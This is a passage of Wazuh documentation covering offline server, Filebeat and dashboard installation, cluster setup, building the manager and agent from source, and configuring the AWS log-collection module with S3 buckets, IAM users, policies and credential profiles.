    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-manager*.rpm
    
  2. Save the Wazuh indexer username and password into the Wazuh manager keystore using the wazuh-keystore tool:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    Note

    The default offline-installation credentials are admin:admin.

  3. Enable and start the Wazuh manager service.

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
  4. Run the following command to verify that the Wazuh manager status is active.

    # systemctl status wazuh-manager
    
Installing Filebeat

Filebeat must be installed and configured on the same server as the Wazuh manager.

  1. Run the following command to install Filebeat.

    # rpm -ivh ./wazuh-offline/wazuh-packages/filebeat*.rpm
    
  2. Copy the configuration files to the appropriate location. Type “yes” at the prompt if asked to confirm overwriting /etc/filebeat/filebeat.yml.

    # cp ./wazuh-offline/wazuh-files/filebeat.yml /etc/filebeat/ &&\
    cp ./wazuh-offline/wazuh-files/wazuh-template.json /etc/filebeat/ &&\
    chmod go+r /etc/filebeat/wazuh-template.json
    
  3. Edit the /etc/filebeat/filebeat.yml configuration file and replace the following value:

    1. hosts: The list of Wazuh indexer nodes to connect to. You can use either IP addresses or hostnames. By default, the host is set to localhost (hosts: ["127.0.0.1:9200"]). Replace it with your Wazuh indexer address accordingly.

      If you have more than one Wazuh indexer node, you can separate the addresses using commas. For example, hosts: ["10.0.0.1:9200", "10.0.0.2:9200", "10.0.0.3:9200"]

      # Wazuh - Filebeat configuration file
      output.elasticsearch:
        hosts: ["10.0.0.1:9200"]
        protocol: https
        username: ${username}
        password: ${password}
      
  4. Create a Filebeat keystore to securely store authentication credentials.

    # filebeat keystore create
    
  5. Add the username and password admin:admin to the secrets keystore.

    # echo admin | filebeat keystore add username --stdin --force
    # echo admin | filebeat keystore add password --stdin --force
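
    Optionally, confirm that both keys were stored by listing the keystore contents. This only prints the key names, not the secret values:

    # filebeat keystore list
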
    
  6. Install the Wazuh module for Filebeat.

    # tar -xzf ./wazuh-offline/wazuh-files/wazuh-filebeat-0.5.tar.gz -C /usr/share/filebeat/module
    
  7. Replace <SERVER_NODE_NAME> with your Wazuh server node certificate name, the same used in config.yml when creating the certificates. For example, wazuh-1. Then, move the certificates to their corresponding location.

    # NODE_NAME=<SERVER_NODE_NAME>
    
    # mkdir /etc/filebeat/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/filebeat/certs/filebeat.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/filebeat/certs/filebeat-key.pem
    # cp wazuh-install-files/root-ca.pem /etc/filebeat/certs/
    # chmod 500 /etc/filebeat/certs
    # chmod 400 /etc/filebeat/certs/*
    # chown -R root:root /etc/filebeat/certs
    
  8. Enable and start the Filebeat service.

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  9. Run the following command to make sure Filebeat is successfully installed.

    # filebeat test output
    

    Expand the output to see an example response.

Your Wazuh server node is now successfully installed. Repeat the steps of this installation stage for every Wazuh server node in your cluster, then expand the Wazuh cluster configuration for multi-node deployment section below and continue with configuring the Wazuh cluster. If you want a Wazuh server single-node cluster, everything is set and you can proceed directly with the Wazuh dashboard installation.

Wazuh cluster configuration for multi-node deployment

After completing the installation of the Wazuh server on every node, configure one server node as the master and the rest as workers.

Configuring the Wazuh server master node
  1. Edit the following settings in the /var/ossec/etc/ossec.conf configuration file.

    <cluster>
      <name>wazuh</name>
      <node_name>master-node</node_name>
      <node_type>master</node_type>
      <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
      <port>1516</port>
      <bind_addr>0.0.0.0</bind_addr>
      <nodes>
        <node><WAZUH_MASTER_ADDRESS></node>
      </nodes>
      <hidden>no</hidden>
      <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node.

    node_type

    It specifies the role of the node. It has to be set to master.

    key

    Key that is used to encrypt communication between cluster nodes. The key must be 32 characters long and the same for all of the nodes in the cluster. The following command can be used to generate a random key: openssl rand -hex 16.

    port

    It indicates the destination port for cluster communication.

    bind_addr

    It is the network IP to which the node is bound to listen for incoming requests (0.0.0.0 for any IP).

    nodes

    It is the address of the master node and can be either an IP or a DNS. This parameter must be specified in all nodes, including the master itself.

    hidden

    It shows or hides the cluster information in the generated alerts.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. This option must be set to no.
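
    For example, the command mentioned above for the key parameter prints a random 32-character hexadecimal string that you can paste into the <key> setting:

    # openssl rand -hex 16
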

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    
Configuring the Wazuh server worker nodes
  1. Edit the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
        <name>wazuh</name>
        <node_name>worker-node</node_name>
        <node_type>worker</node_type>
        <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
        <port>1516</port>
        <bind_addr>0.0.0.0</bind_addr>
        <nodes>
            <node><WAZUH_MASTER_ADDRESS></node>
        </nodes>
        <hidden>no</hidden>
        <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node. Each node of the cluster must have a unique name.

    node_type

    It specifies the role of the node. It has to be set to worker.

    key

    The key created previously for the master node. It has to be the same for all the nodes.

    nodes

    It has to contain the address of the master node and can be either an IP or a DNS.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. It has to be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    

Repeat these configuration steps for every Wazuh server worker node in your cluster.

Testing Wazuh server cluster

To verify that the Wazuh cluster is enabled and all the nodes are connected, execute the following command:

# /var/ossec/bin/cluster_control -l

An example output of the command looks as follows:

NAME     TYPE    VERSION  ADDRESS
wazuh-1  master  5.0.0    10.0.0.3
wazuh-3  worker  5.0.0    10.0.0.5
wazuh-2  worker  5.0.0    10.0.0.4

Note that 10.0.0.3, 10.0.0.4, 10.0.0.5 are example IPs.

Installing the Wazuh dashboard

The following dependencies must be installed on the Wazuh dashboard node.

  • libcap

  1. Run the following commands to install the Wazuh dashboard.

    # rpm --import ./wazuh-offline/wazuh-files/GPG-KEY-WAZUH
    # rpm -ivh ./wazuh-offline/wazuh-packages/wazuh-dashboard*.rpm
    
  2. Replace <DASHBOARD_NODE_NAME> with your Wazuh dashboard node name, the same used in config.yml to create the certificates. For example, dashboard. Then, move the certificates to their corresponding location.

    # NODE_NAME=<DASHBOARD_NODE_NAME>
    
    # mkdir /etc/wazuh-dashboard/certs
    # mv -n wazuh-install-files/$NODE_NAME.pem /etc/wazuh-dashboard/certs/dashboard.pem
    # mv -n wazuh-install-files/$NODE_NAME-key.pem /etc/wazuh-dashboard/certs/dashboard-key.pem
    # cp wazuh-install-files/root-ca.pem /etc/wazuh-dashboard/certs/
    # chmod 500 /etc/wazuh-dashboard/certs
    # chmod 400 /etc/wazuh-dashboard/certs/*
    # chown -R wazuh-dashboard:wazuh-dashboard /etc/wazuh-dashboard/certs
    
  3. Edit the /etc/wazuh-dashboard/opensearch_dashboards.yml file and replace the following values:

    1. server.host: This setting specifies the host of the back end server. To allow remote users to connect, set the value to the IP address or DNS name of the Wazuh dashboard. The value 0.0.0.0 will accept all the available IP addresses of the host.

    2. opensearch.hosts: The URLs of the Wazuh indexer instances to use for all your queries. The Wazuh dashboard can be configured to connect to multiple Wazuh indexer nodes in the same cluster. The addresses of the nodes can be separated by commas. For example, ["https://10.0.0.2:9200", "https://10.0.0.3:9200","https://10.0.0.4:9200"]

         server.host: 0.0.0.0
         server.port: 443
         opensearch.hosts: https://127.0.0.1:9200
         opensearch.ssl.verificationMode: certificate
      
  4. Enable and start the Wazuh dashboard.

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    
  5. Edit the file /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml and replace the url value with the IP address or hostname of the Wazuh server master node.

    hosts:
      - default:
          url: https://<WAZUH_SERVER_IP_ADDRESS>
          port: 55000
          username: wazuh-wui
          password: wazuh-wui
          run_as: false
    
  6. Run the following command to verify the Wazuh dashboard service is active.

    # systemctl status wazuh-dashboard
    
  7. Access the Wazuh web interface.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: admin

Upon the first access to the Wazuh dashboard, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser or, for increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, a certificate from a trusted authority can be configured.

Securing your Wazuh installation

You have now installed and configured all the Wazuh central components. We recommend changing the default credentials to protect your infrastructure from possible attacks.

Select your deployment type and follow the instructions to change the default passwords for both the Wazuh API and the Wazuh indexer users.

  1. Use the Wazuh passwords tool to change all the internal users' passwords.

    # /usr/share/wazuh-indexer/plugins/opensearch-security/tools/wazuh-passwords-tool.sh --api --change-all --admin-user wazuh --admin-password wazuh
    
    INFO: The password for user admin is yWOzmNA.?Aoc+rQfDBcF71KZp?1xd7IO
    INFO: The password for user kibanaserver is nUa+66zY.eDF*2rRl5GKdgLxvgYQA+wo
    INFO: The password for user kibanaro is 0jHq.4i*VAgclnqFiXvZ5gtQq1D5LCcL
    INFO: The password for user logstash is hWW6U45rPoCT?oR.r.Baw2qaWz2iH8Ml
    INFO: The password for user readall is PNt5K+FpKDMO2TlxJ6Opb2D0mYl*I7FQ
    INFO: The password for user snapshotrestore is +GGz2noZZr2qVUK7xbtqjUup049tvLq.
    WARNING: Wazuh indexer passwords changed. Remember to update the password in the Wazuh dashboard and Filebeat nodes if necessary, and restart the services.
    INFO: The password for Wazuh API user wazuh is JYWz5Zdb3Yq+uOzOPyUU4oat0n60VmWI
    INFO: The password for Wazuh API user wazuh-wui is +fLddaCiZePxh24*?jC0nyNmgMGCKE+2
    INFO: Updated wazuh-wui user password in wazuh dashboard. Remember to restart the service.
    
Next steps

Once the Wazuh environment is ready, Wazuh agents can be installed on every endpoint to be monitored. To install the Wazuh agents and start monitoring the endpoints, see the Wazuh agent installation section. If you need to install them offline, you can check the appropriate agent package to download for your monitored system in the Wazuh agent packages list section.

To uninstall all the Wazuh central components, see the Uninstalling the Wazuh central components section.

Installation from sources

Installing from sources gives you more control over how Wazuh is deployed. You can customize build options and target operating systems that are not covered in existing packages.

Benefits of installing from sources
  • More control over compiler, libraries, and paths.

  • Ability to apply local patches or custom build flags.

The Wazuh manager and agent can be installed from sources as an alternative to installation from packages:

Installing the Wazuh manager from sources

The Wazuh manager is the core component of the Wazuh server that processes and analyzes security data from Wazuh agents and other sources. It includes the analysis engine for log processing, rule evaluation, and alert generation, along with services for the Wazuh agent enrollment and connection.

This section covers installing dependencies, downloading and compiling the source code, running the installation wizard, and uninstalling the manager if needed.

Installing dependencies

Before compiling Wazuh from sources, you need to install the required build tools and libraries for the destination operating system. This section covers the essential development tools, compilers, and build utilities needed to compile the Wazuh manager successfully.

# apt-get update
# apt-get install python3 gcc g++ make libc6-dev curl policycoreutils automake autoconf libtool libssl-dev procps build-essential

CMake 3.18 installation

# curl -OL https://packages.wazuh.com/utils/cmake/cmake-3.18.3.tar.gz && tar -zxf cmake-3.18.3.tar.gz && cd cmake-3.18.3 && ./bootstrap --no-system-curl && make -j$(nproc) && make install
# cd .. && rm -rf cmake-*
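
You can verify that the expected CMake version is now available in your PATH before continuing:

# cmake --version
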

Optional: Install the following dependencies only when compiling CPython from sources. Since v4.2.0, make deps TARGET=server downloads a portable version of CPython ready to be installed. Nevertheless, you can download the CPython sources by adding the PYTHON_SOURCE flag when running make deps.

Follow these steps to install the required dependencies to build the Python interpreter:

# echo "deb-src http://archive.ubuntu.com/ubuntu $(lsb_release -cs) main" >> /etc/apt/sources.list
# apt-get update
# apt-get build-dep python3 -y

Note

The Python version from the previous command may change depending on the OS used to build the binaries. For more information, refer to the Install dependencies page.

Installing the Wazuh manager

This section walks you through downloading the Wazuh source code, compiling it, and running the installation wizard to set up the Wazuh manager on your system.

  1. Download and extract the latest version:

    # curl -Ls https://github.com/wazuh/wazuh/archive/v5.0.0.tar.gz | tar zx
    # cd wazuh-5.0.0
    
  2. If you have previously compiled for another platform, clean the build using the Makefile in src/:

    # make -C src clean
    # make -C src clean-deps
    
  3. Run the install.sh script. This will display a wizard to guide you through the installation process using the Wazuh sources:

    Warning

    If you want to enable the database output, check out the Alert management section before running the installation script.

    # ./install.sh
    

    The initial run might take some time as it downloads and processes the vulnerability detection content. To speed up this process, you can set the DOWNLOAD_CONTENT environment variable to y beforehand. The adjusted command downloads a pre-prepared database during installation.

    # DOWNLOAD_CONTENT=y ./install.sh
    
  4. When the script asks what kind of installation you want, type manager to install the Wazuh manager:

    1- What kind of installation do you want (manager, agent, local, hybrid, or help)? manager
    

    Note

    During the installation, users can decide the installation path. Execute the ./install.sh script and select the language, set the installation mode to manager, then set the installation path (Choose where to install Wazuh [/var/ossec]). The default installation path is /var/ossec. A commonly used custom path is /opt.

    Warning

    Be extremely careful not to select a critical installation directory if you choose a different path than the default. If the directory already exists, the installer will ask to delete the directory or proceed by installing Wazuh inside it.

  5. The installer asks if you want to start Wazuh at the end of the installation. If you choose not to, you can start it later with:

    # systemctl start wazuh-manager
    
Installing other Wazuh components

Once the Wazuh manager is installed from source, you can install the Wazuh indexer, Filebeat, and the Wazuh dashboard by following the Installation guide. The Wazuh indexer and dashboard are excluded from the installation from sources procedure, as they rely on pre-built packages.

Uninstall

This section provides instructions for completely removing the Wazuh manager installation from your system.

  1. To uninstall the Wazuh manager, set WAZUH_HOME with the current installation path:

    # WAZUH_HOME="/WAZUH/INSTALLATION/PATH"
    
  2. Stop the service:

    # service wazuh-manager stop 2> /dev/null
    
  3. Stop the daemon:

    # $WAZUH_HOME/bin/wazuh-control stop 2> /dev/null
    
  4. Remove the installation folder and all its content:

    # rm -rf $WAZUH_HOME
    
  5. Delete the service:

    # [ -f /etc/rc.local ] && sed -i'' '/wazuh-control start/d' /etc/rc.local
    # find /etc/{init.d,rc*.d} -name "*wazuh*" | xargs rm -f
    
  6. Remove Wazuh user and group:

    # userdel wazuh 2> /dev/null
    # groupdel wazuh 2> /dev/null
    
Installing the Wazuh agent from sources

The Wazuh agent is lightweight, multi-platform monitoring software that provides visibility into endpoint security by collecting critical system and application logs and events. The following section explains how to install it from sources across different operating systems.

This section covers installing dependencies, downloading and compiling the source code, running the installation wizard, and uninstalling the Wazuh agent if necessary.

Installing dependencies

Before compiling Wazuh from sources, you need to install the required build tools and libraries for the destination operating system. This section covers the essential development tools, compilers, and build utilities needed to compile the Wazuh agent successfully on different platforms.

Note

You need root user privileges to run all the commands described below. Since Wazuh 3.5, an Internet connection is required to follow this process.

Note

CMake 3.12.4 is the minimum version required to build the Wazuh agent solution.

Note

GCC 9.4 is the minimum compiler version required to build the Wazuh agent solution.

  1. Install development tools and compilers. In Linux, this can easily be done using your distribution’s package manager:

# apt-get install python3 gcc g++ make libc6-dev curl policycoreutils automake autoconf libtool libssl-dev procps build-essential

CMake 3.18 installation

# curl -OL https://packages.wazuh.com/utils/cmake/cmake-3.18.3.tar.gz && tar -zxf cmake-3.18.3.tar.gz && cd cmake-3.18.3 && ./bootstrap --no-system-curl && make -j$(nproc) && make install
# cd .. && rm -rf cmake-*
Installing the Wazuh agent

This section walks you through downloading the Wazuh source code, compiling it, and running the installation wizard to set up the Wazuh agent on your system.

  1. Download and extract the latest version:

    # curl -Ls https://github.com/wazuh/wazuh/archive/v5.0.0.tar.gz | tar zx
    # cd wazuh-5.0.0
    
  2. If you have previously compiled for another platform, you must clean the build using the Makefile in src/:

    # make -C src clean
    # make -C src clean-deps
    
  3. Build the Wazuh agent with gcc-14 and g++-14. This step only applies to distributions that use the Pacman package manager:

    # cd src
    # make TARGET=agent deps
    # make TARGET=agent CC=gcc-14 CXX=g++-14
    # cd ..
    
  4. Run the install.sh script. This will run a wizard that will guide you through the installation process using the Wazuh sources:

    # ./install.sh
    

    Note

    During the installation, users can decide the installation path. Execute the ./install.sh script and select the language, set the installation mode to agent, then set the installation path (Choose where to install Wazuh [/var/ossec]). The default installation path is /var/ossec. A commonly used custom path is /opt. When choosing a different path than the default, if the directory already exists, the installer will ask to delete the directory or proceed by installing Wazuh inside it. You can also run an unattended installation.

  5. The script asks what kind of installation you want. Type agent to install a Wazuh agent:

    1- What kind of installation do you want (manager, agent, local, hybrid or help)? agent
    
Next steps

Now that the agent is installed, the next step is to enroll the agent with the Wazuh server. Check the Wazuh agent enrollment section for more information about this process.

Uninstall
  1. To uninstall the Wazuh agent, set WAZUH_HOME with the current installation path:

    # WAZUH_HOME="/WAZUH/INSTALLATION/PATH"
    
  2. Stop the service:

    # service wazuh-agent stop 2> /dev/null
    
  3. Stop the daemon:

    # $WAZUH_HOME/bin/wazuh-control stop 2> /dev/null
    
  4. Remove the installation folder and all its content:

    # rm -rf $WAZUH_HOME
    
  5. Delete the service:

    # [ -f /etc/rc.local ] && sed -i'' '/wazuh-control start/d' /etc/rc.local
    # find /etc/{init.d,rc*.d} -name "*wazuh*" | xargs rm -f
    
  6. Remove Wazuh user and group:

    # userdel wazuh 2> /dev/null
    # groupdel wazuh 2> /dev/null
    

Deployment with Ansible

Ansible is an open source platform designed for automating tasks. It uses playbooks, written in a descriptive YAML-based language, to make it easy to create and describe automation jobs. Ansible communicates with every host over SSH, which makes it very secure. See Ansible Overview for more information.

Deployment with Puppet

Puppet is open source software that automatically inspects, delivers, operates, and future-proofs all of your software, no matter where it runs. It works on many Unix-like systems as well as Microsoft Windows and includes its own declarative language to describe system configuration. It provides an alternative way to install and configure Wazuh.

User manual

Welcome to the Wazuh user manual. Use it as your reference library once your basic Wazuh installation is ready. In this section, you will find content on topics such as Wazuh server administration, Wazuh agent enrollment, Wazuh capabilities, and many others that are listed below.

Cloud security

Wazuh helps increase the security of some of the most comprehensive and broadly adopted cloud platforms, such as AWS, Microsoft Azure, and GCP. Learn more about Wazuh Cloud security in the sections below:

Monitoring Amazon Web Services (AWS)

Amazon Web Services (AWS) is a widely used cloud computing platform provided by Amazon. It offers a broad set of services, including computing power, storage, databases, machine learning, analytics, security, and more. AWS enables individuals, businesses, and organizations to access and utilize computing resources without the need to invest in and maintain physical infrastructure.

Wazuh, an open source security platform, provides a comprehensive suite of features to monitor and improve the security of your AWS infrastructure. You can install Wazuh agents on your EC2 instances or integrate the Wazuh module for AWS with supported AWS services. This allows you to analyze events and receive near real-time alerts for anomalies within your AWS infrastructure.

You can learn how to monitor your AWS infrastructure in the following sections:

Monitoring AWS instances

By installing the Wazuh agent on your AWS EC2 instances, you gain insights and monitor activities within these instances.

The Wazuh agent runs as a service on an EC2 instance, and collects and forwards system, security and application data to the Wazuh server through an encrypted and authenticated channel.

To install the Wazuh agent on an EC2 instance, follow the instructions available in the agent installation guide. The Wazuh agent allows you to monitor your EC2 instance with these capabilities:

To learn more about the different Wazuh capabilities, check out this section.

Monitoring AWS based services

The Wazuh module for AWS enables monitoring of various AWS services by collecting their logs and analyzing them with the Wazuh ruleset. This allows Wazuh to trigger alerts based on EC2 instance configuration, unauthorized behavior of users and systems, data stored on S3, and more, thereby providing detailed information about activities within the AWS infrastructure.

Each section below contains detailed instructions to configure and set up all of the supported AWS services, and also the required Wazuh configuration to collect logs from these services. It also includes steps to resolve common issues that you may encounter.

This module requires several dependencies to work, and also the right credentials to access the AWS services. Take a look at the prerequisites section before proceeding.

Prerequisites

In this section, we outline the requirements for setting up Wazuh to retrieve logs from various AWS services.

Installing dependencies

You can configure the Wazuh module for AWS either in the Wazuh manager or in a Wazuh agent. This choice depends solely on how you access your AWS infrastructure in your environment.

You only need to install dependencies when configuring the integration with AWS in a Wazuh agent. The Wazuh manager already includes all the necessary dependencies.

We outline the dependencies needed to configure the integration on a Wazuh agent installed on a Linux endpoint.

Python

The Wazuh module for AWS is compatible with Python 3.8–3.13. While later Python versions should also work, we cannot guarantee their compatibility. If you do not have Python 3 already installed, run the following command on your monitored endpoint.

# apt-get update && apt-get install python3

You can install the required modules with Pip, the Python package manager. Most UNIX distributions have this tool available in their software repositories. Run the following command to install pip on your endpoint if you do not have it already installed.

# apt-get update && apt-get install python3-pip

We recommend using Pip 19.3 or later to simplify the installation of the dependencies. Run this command to check your pip version.

# pip3 --version

An example output is as follows.

pip 22.0.2 from /usr/lib/python3/dist-packages/pip (python 3.10)

If your pip version is less than 19.3, run the following command to upgrade the version.

# pip3 install --upgrade pip
AWS client library for Python

Boto3 is the official package supported by Amazon to manage AWS resources. It is used to download log messages from the different AWS services supported by Wazuh. The Wazuh module for AWS is compatible with boto3 from version 1.13.1 to 1.17.85. Future boto3 releases should maintain compatibility, although we cannot guarantee it.

Execute the following command to install the dependencies:

# pip3 install boto3==1.34.135 pyarrow==14.0.1 numpy==1.26.0
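
To confirm that the modules were installed for the Python interpreter that Wazuh will use, you can print the installed boto3 version. This is a quick check, not part of the official procedure:

# python3 -c "import boto3; print(boto3.__version__)"
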
Configuring an S3 Bucket

Amazon Simple Storage Service (Amazon S3) is an object storage service that delivers industry-leading scalability, data availability, security, and performance.

The Wazuh module for AWS requires all supported AWS services, except Inspector, CloudWatch Logs, and Security Lake, to store their logs in an S3 bucket. You can use a single S3 bucket for all these services, avoiding the need to create separate buckets. Wazuh retrieves the logs from this bucket for analysis.

In this section we describe how to create an Amazon S3 bucket:

  1. On your AWS console, go to Services > Storage > S3.

    S3 storage service
  2. Click Create bucket to create a new S3 bucket.

    Create a bucket
  3. Enter the name of your S3 bucket, then click Create bucket.

    Create bucket 2
    Create bucket 3

Note

Copy the bucket ARN because it will be needed later for some AWS services.

Configuring AWS IAM Identities

In AWS Identity and Access Management (IAM), an identity represents a human user or programmatic workload that can be authenticated and authorized to perform actions in AWS. The Wazuh module for AWS requires authentication and authorization through an IAM identity to integrate with supported AWS services.

In the following sections, we describe how to create an IAM user group, how to create an AWS IAM user with access credentials, and how to add the user to the group.

Creating an IAM user group
  1. Create a user group that an AWS IAM user will be added to.

    1. On the AWS console, search for iam and click IAM from the results.

      Find IAM
    2. Go to User groups and click Create group to create a new group.

      Click Create group
    3. Assign a name for the group, scroll down, and click Create group.

      Click Create group 2
      Click Create group 3
    4. Confirm the group has been successfully created.

      Confirm group creation
Creating an IAM user

Wazuh requires an AWS IAM user with the necessary permissions to collect log data from the different AWS services. We show below how to create a new IAM user in your AWS environment and obtain the access credentials.

  1. Create a new IAM user and add it to a user group:

    1. On your AWS console, navigate to Services > IAM > Users > Create user.

      Create IAM user
    2. Assign a username and click Next.

      Create IAM user
    3. Assign the user to the previously created group and click Next to proceed.

      Add user to group
    4. Review the selected options and click Create user.

      Click Create user
    5. Confirm the user creation

      Confirm user creation
  2. Obtain the necessary access credentials for the IAM user.

    1. Click on the created IAM user, go to Security credentials, scroll down to Access keys, and click Create access key.

      Create access key
    2. Select and confirm the Command Line Interface (CLI) use case and click Next.

      Command Line Interface selection
    3. Assign a description tag value and click Create access key.

      Create access key
    4. Save the access credentials; you will use them later to configure the Wazuh module for AWS. If you don't copy the credentials before you click Done, you cannot recover them later. However, you can create a new secret access key.

      Save access keys

Depending on the service that will be monitored, the AWS IAM user will need a different set of permissions. The permissions required for each service are explained on each page of the supported services listed in the supported services section.

Configuring AWS policy

In AWS, a policy is an entity that links permissions with an identity or resource. The permissions in a policy determine whether a request is allowed or denied.

In this section, we describe how to create an AWS policy and how to attach the policy to a group.

Creating an AWS policy

Depending on the AWS service that will be monitored, the AWS IAM user will need different sets of permissions. The permissions required for each AWS service are explained on each page of the supported services section.

Follow the steps below on your AWS console to create an AWS policy that collects logs from an S3 bucket.

  1. On the AWS console, search for iam and click IAM from the results.

    Find IAM
  2. Click Policies > Create policy.

    Create policy
  3. Switch to JSON view, remove the default statement, and paste the following configuration. Replace <WAZUH_AWS_BUCKET> with the name of the previously created S3 bucket. In this example, the policy allows the IAM user to return and retrieve an object from the specified S3 bucket.

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "GetS3Logs",
                "Effect": "Allow",
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Resource": [
                    "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                    "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
                ]
            }
        ]
    }
    
    1. Click Next to proceed to the next step.

      Create policy
    2. Click Create policy to create a new policy.

      Create policy
    3. Confirm the policy creation.

      Confirm policy creation
Attaching a policy to an IAM user group

After you create a policy, you can attach it to groups, users, or roles. In this guide, we show how to create a group and how to attach a policy to a group using the AWS console.

  1. On the AWS console, search for iam and click IAM from the results.

    Find IAM
  2. Navigate to User groups and click on a previously created group.

    Click user group
  3. Navigate to Permissions, click Add permissions, then Attach policies.

    Attach policies
  4. Search for the policy, select the checkbox next to it, and click Attach policies to attach it to the group.

    Select and attach the policy
  5. Confirm the policy is attached to the group.

    Confirm policy creation
Configuring AWS credentials

You can configure the Wazuh module for AWS on the Wazuh server (which also behaves as the Wazuh agent) or on a Wazuh agent installed on a Linux endpoint. Depending on the authentication option used, the Wazuh module for AWS will require access credentials of an AWS Identity and Access Management (IAM) identity to collect log data from the different AWS services. These credentials need to be stored in a file named .aws/credentials on the Wazuh server or agent.

You need to create the credentials file as the root user because the wazuh-modulesd daemon runs with root permissions. Ensure the .aws/credentials file is saved in the home directory of the root user, so the absolute file path is /root/.aws/credentials. This file is required for all authentication options except IAM roles for EC2 instances.
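
As a minimal sketch of preparing this location as the root user, you can create the file and restrict its permissions as shown below. The credential values themselves follow the format shown in the Profiles section, and the restrictive permissions are a recommended precaution rather than a requirement of the module:

# mkdir -p /root/.aws
# touch /root/.aws/credentials
# chmod 700 /root/.aws
# chmod 600 /root/.aws/credentials
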

In the following sections, we describe how to configure the Wazuh module for AWS to pull AWS services logs using these credentials.

Authenticating options

Credentials can be loaded from different locations. You can specify the credentials in a file, assume an IAM role, or load them from other Boto3 supported locations.

In this section, we describe the several methods of adding the AWS credentials to Wazuh and how to configure the Wazuh module for AWS to use the credentials.

Profiles

Profiles are logical groups of configuration settings. You can set up multiple profiles in the following files.

  • /root/.aws/credentials: Each profile defines the access keys for a previously created IAM user.

  • /root/.aws/config: Each corresponding profile specifies an AWS region.

In the example below, the /root/.aws/credentials file defines the default, dev, and prod profiles.

[default]
aws_access_key_id=foo
aws_secret_access_key=bar

[dev]
aws_access_key_id=foo2
aws_secret_access_key=bar2

[prod]
aws_access_key_id=foo3
aws_secret_access_key=bar3

The /root/.aws/config file specifies the AWS region for each profile:

[default]
region = us-east-1

[profile dev]
region = us-east-1

[profile prod]
region = us-east-1

After setting up the profiles, define which one the Wazuh module for AWS will use to collect logs. Configure this in the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. The example below configures the module to pull Amazon CloudTrail logs from the specified bucket using the prod profile.

<bucket type="cloudtrail">
  <name>wazuh-s3-bucket</name>
  <aws_profile>prod</aws_profile>
</bucket>
IAM Roles

An IAM role is an identity within your AWS account with specific permissions. It's similar to an IAM user but isn't associated with a specific person. Trusted entities can also use IAM roles to interact with different AWS services. An IAM role can be assumed by AWS services, applications running on Amazon EC2 instances, and AWS Identity and Access Management (IAM) users.

Note

This authentication method requires some credentials to be previously added to the configuration using any other authentication method.

This section shows how to create a sample IAM role with read-only permissions to pull data from a bucket:

  1. Go to Services > Security, Identity, & Compliance > IAM.

    Select IAM
  2. Go to Roles on the left side of the AWS console and click Create role.

    Create role
  3. Choose AWS service as the Trusted entity type, select S3 as the service and use case, then click Next.

    Select trusted entity
  4. Select a previously created policy and click Next.

    Select policy
  5. Give the role a descriptive name and click Create role.

    Assign name to role
    Create role
  6. Access the role Summary and click on its Policy name.

    Click a policy
  7. Add permissions so the new role can perform the sts:AssumeRole action.

    Add STS AssumeRole action
  8. Go back to the role Summary, go to the Trust relationships tab, and click Edit trust policy.

    Edit trust relationship
  9. Add the AWS IAM user to the Principal tag and click Update policy.

    Add user to Principal
  10. After updating the trust policy, copy the Amazon Resource Name (ARN) of the role as this will be used to configure the Wazuh module for AWS.

    Update trust policy

It is necessary to configure the Wazuh module for AWS using the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. In the example below, we configure the Wazuh module for AWS to pull Amazon CloudTrail logs from the specified bucket using the default profile and the Wazuh-IAM-Role IAM role.

<bucket type="cloudtrail">
   <name><WAZUH_AWS_BUCKET></name>
   <aws_profile>default</aws_profile>
   <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/Wazuh-IAM-Role</iam_role_arn>
</bucket>
IAM roles for EC2 instances

You can use IAM roles and assign them to EC2 instances so there's no need to insert authentication parameters in the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. This is the recommended configuration if the Wazuh server or agent is running on an EC2 instance. Find more information about IAM roles on EC2 instances in the official Amazon AWS documentation.

In the example below, we configure the Wazuh module for AWS to pull Amazon CloudTrail logs from the specified bucket using the IAM roles for EC2 instances.

<bucket type="cloudtrail">
  <name><WAZUH_AWS_BUCKET></name>
</bucket>
Considerations for the Wazuh module for AWS configuration
First execution

The Wazuh module for AWS will only fetch the AWS services logs from the date the module is first executed. If there are older logs that need to be fetched during the first execution of the module, you need to use the only_logs_after option.

Note

If you need to fetch older logs after the first execution of the Wazuh module for AWS, see the Reparse section.

Filtering

If the S3 bucket contains a long history of logs and its directory structure is organized by dates, it's possible to filter which logs will be read by Wazuh. There are multiple configuration options to do so:

  • only_logs_after: Allows filtering logs produced after a given date. The date format must be YYYY-MMM-DD. For example, 2018-AUG-21 would filter logs generated on or after the 21st of August 2018.

  • aws_account_id: This option will only work on CloudTrail, VPC, and Config buckets. If you have logs from multiple accounts, you can filter which ones will be read by Wazuh. You can specify multiple IDs separating them by commas.

